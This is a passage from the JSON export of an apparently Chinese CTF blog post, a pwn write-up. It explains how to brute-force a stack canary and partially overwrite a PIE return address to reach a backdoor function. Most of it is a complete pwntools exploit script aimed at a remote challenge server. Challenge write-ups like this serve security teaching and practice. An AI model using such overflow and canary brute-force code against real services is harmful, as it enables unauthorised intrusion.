978px) 100vw, 978px\" \/><\/div><\/figure>\n\n\n\n<p>\u540c\u65f6\u672c\u9898\u8fd8\u7ed9\u4e86\u540e\u95e8\u51fd\u6570\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-28.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"765\" height=\"294\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-28.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-386\"  sizes=\"auto, (max-width: 765px) 100vw, 765px\" \/><\/div><\/figure>\n\n\n\n<p>\u6240\u4ee5\u601d\u8def\u5c31\u662f\uff0c\u7206\u7834canary\uff0c\u6ea2\u51fa\u5230\u540e\u95e8\u51fd\u6570\u6267\u884c\uff0c\u7531\u4e8e\u672c\u9898\u8fd8\u5f00\u4e86PIE\uff0c\u6240\u4ee5PIE\u8fd8\u5f97\u7206\u7834\u4e00\u4e0b\uff0c\u7531\u4e8e\u540e\u4e09\u4f4d\u4e0d\u53d8\uff0c\u800c\u540e\u95e8\u51fd\u6570\u4e0e\u8fd4\u56de\u5730\u5740\u6700\u6781\u7aef\u5c31\u53ea\u662f\u6700\u540e\u56db\u4f4d\u6709\u5dee\u522b\uff0c\u6240\u4ee5\u5b9e\u9645\u4e0a\u7206\u7834\u7684\u53ea\u6709\u5012\u6570\u7b2c\u56db\u4f4d\u3002<\/p>\n\n\n\n<p>exp:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *\n\ncontext.log_level = 'info'\n\n#io = process('\/home\/monke\/PWN\/funcanary')\n\nio = remote('49.232.142.230', 13574)\n\nelf = ELF('\/home\/monke\/PWN\/funcanary')\n\nio.recvuntil(b'welcome\\n')\n\ncanary = b'\\x00' \u00a0\n\nfor k in range(7): \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n\n\u00a0\u00a0\u00a0\u00a0for i in range(256):\n\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0payload = b'a' * 0x68 + canary + bytes(&#91;i]) \u00a0\n\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0io.send(payload)\n\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0data = io.recvuntil('welcome\\n')\n\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0print(data)\n\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if b\"fun\" in data:\n\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0canary += bytes(&#91;i])\n\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0print(\"canary is:\" + str(canary))\n\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0break\n\nio.send(b'a'*0x68 + canary + b'b'*0x8 + b'\\x31\\x02')\n\nbuf=io.recvuntil(b'welcome\\n')\n\nprint(buf)\n\nio.send(b'a'*0x68 + canary + b'b'*0x8 + b'\\x31\\x12')\n\nbuf=io.recvuntil(b'welcome\\n')\n\nprint(buf)\n\nio.send(b'a'*0x68 + canary + b'b'*0x8 + b'\\x31\\x22')\n\nbuf=io.recvuntil(b'welcome\\n')\n\nprint(buf)\n\nio.send(b'a'*0x68 + canary + b'b'*0x8 + b'\\x31\\x32')\n\nbuf=io.recvuntil(b'welcome\\n')\n\nprint(buf)\n\nio.send(b'a'*0x68 + canary + b'b'*0x8 + b'\\x31\\x42')\n\nbuf=io.recvuntil(b'welcome\\n')\n\nprint(buf)\n\nio.send(b'a'*0x68 + canary + b'b'*0x8 + b'\\x31\\x52')\n\nbuf=io.recvuntil(b'welcome\\n')\n\nprint(buf)\n\nio.send(b'a'*0x68 + canary + b'b'*0x8 + b'\\x31\\x62')\n\nbuf=io.recvuntil(b'welcome\\n')\n\nprint(buf)\n\nio.send(b'a'*0x68 + canary + b'b'*0x8 + b'\\x31\\x72')\n\nbuf=io.recvuntil(b'welcome\\n')\n\nprint(buf)\n\nio.send(b'a'*0x68 + canary + b'b'*0x8 + b'\\x31\\x82')\n\nbuf=io.recvuntil(b'welcome\\n')\n\nprint(buf)\n\nio.send(b'a'*0x68 + canary + b'b'*0x8 + b'\\x31\\x92')\n\nbuf=io.recvuntil(b'welcome\\n')\n\nprint(buf)\n\nio.send(b'a'*0x68 + canary + b'b'*0x8 + b'\\x31\\xa2')\n\nbuf=io.recvuntil(b'welcome\\n')\n\nprint(buf)\n\nio.send(b'a'*0x68 + canary + b'b'*0x8 + b'\\x31\\xb2')\n\nbuf=io.recvuntil(b'welcome\\n')\n\nprint(buf)\n\nio.send(b'a'*0x68 + canary + b'b'*0x8 + b'\\x31\\xc2')\n\nbuf=io.recvuntil(b'welcome\\n')\n\nprint(buf)\n\nio.send(b'a'*0x68 + canary + b'b'*0x8 + b'\\x31\\xd2')\n\nbuf=io.recvuntil(b'welcome\\n')\n\nprint(buf)\n\nio.send(b'a'*0x68 + canary + b'b'*0x8 + b'\\x31\\xe2')\n\nbuf=io.recvuntil(b'welcome\\n')\n\nprint(buf)\n\nio.send(b'a'*0x68 + canary + b'b'*0x8 + b'\\x31\\xf2')\n\nbuf=io.recvuntil(b'welcome\\n')\n\nprint(buf)\n\nio.interactive()<\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-31-1024x482.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"482\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-31-1024x482.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-389\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>\u70e7\u70e4\u644a(\u6574\u6570\u6ea2\u51fa+ROP+ORW) \u770b\u8d77\u6765\u50cf\u83dc\u5355\uff0c\u4f46\u662f\u4e0d\u662f\u5806\u9898\uff1a 1\u8ddf2\u662f\u5564\u9152\u548c\u4e32\uff0c\u7528\u6765\u51cf\u53bb\u91d1\u989d\u7684\uff0c3\u662f\u770b\u8fd8\u5269 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[14,8],"class_list":["post-372","post","type-post","status-publish","format-standard","hentry","category-game","tag-pwn","tag-8"],"_links":{"self":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts\/372","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/comments?post=372"}],"version-history":[{"count":2,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts\/372\/revisions"}],"predecessor-version":[{"id":392,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts\/372\/revisions\/392"}],"wp:attachment":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/media?parent=372"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/categories?post=372"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/tags?post=372"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}